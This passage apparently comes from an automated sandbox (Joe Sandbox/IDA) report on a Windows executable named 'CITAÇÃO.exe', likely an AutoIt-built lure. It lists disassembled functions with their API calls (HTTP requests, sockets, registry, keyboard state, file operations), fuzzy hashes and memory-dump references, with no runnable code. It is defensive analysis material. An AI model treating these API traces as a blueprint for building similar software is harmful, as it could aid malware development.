• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
• Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
• Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
• Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• _wcslen.LIBCMT ref: 004335F2
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
• Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                      • __lock.LIBCMT ref: 00417981
                                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                      • __lock.LIBCMT ref: 004179A2
                                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                                      Strings
                                                      Similarity
                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                      • String ID: KERNEL32.DLL$pI
                                                      • API String ID: 637971194-197072765
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove$_malloc
                                                      • String ID:
                                                      • API String ID: 1938898002-0
                                                      APIs
                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                      Similarity
                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                      • String ID:
                                                      • API String ID: 3771399671-0
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                      • _memmove.LIBCMT ref: 0044B555
                                                      • _memmove.LIBCMT ref: 0044B578
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                      • String ID:
                                                      • API String ID: 2737351978-0
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                      • __calloc_crt.LIBCMT ref: 00415246
                                                      • __getptd.LIBCMT ref: 00415253
                                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                      • _free.LIBCMT ref: 0041529E
                                                      • __dosmaperr.LIBCMT ref: 004152A9
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                      • String ID:
                                                      • API String ID: 3638380555-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                      Strings
                                                      Similarity
                                                      • API ID: Variant$Copy$ClearErrorInitLast
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 3207048006-625585964
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                      • _memmove.LIBCMT ref: 004656CA
                                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                      • WSACleanup.WSOCK32 ref: 00465762
                                                      Similarity
                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                      • String ID:
                                                      • API String ID: 2945290962-0
                                                      APIs
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                      Similarity
                                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                      • String ID:
                                                      • API String ID: 1457242333-0
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                      Similarity
                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                      • String ID:
                                                      • API String ID: 15295421-0
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • _wcstok.LIBCMT ref: 004675B2
                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                      • _wcscpy.LIBCMT ref: 00467641
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                      • _wcslen.LIBCMT ref: 00467793
                                                      • _wcslen.LIBCMT ref: 004677BD
                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                      • String ID: X
                                                      • API String ID: 780548581-3081909835
                                                      • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                      • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                      APIs
                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                      • CloseFigure.GDI32(?), ref: 0044751F
                                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                      • String ID:
                                                      • API String ID: 4082120231-0
                                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                      • String ID:
                                                      • API String ID: 2027346449-0
                                                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                      • GetMenu.USER32 ref: 0047A703
                                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                      • _wcslen.LIBCMT ref: 0047A79E
                                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                      • String ID:
                                                      • API String ID: 3257027151-0
                                                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                      APIs
                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastselect
                                                      • String ID:
                                                      • API String ID: 215497628-0
                                                      • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                      • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                      APIs
                                                      • GetParent.USER32(?), ref: 0044443B
                                                      • GetKeyboardState.USER32(?), ref: 00444450
                                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                      Memory Dump Source
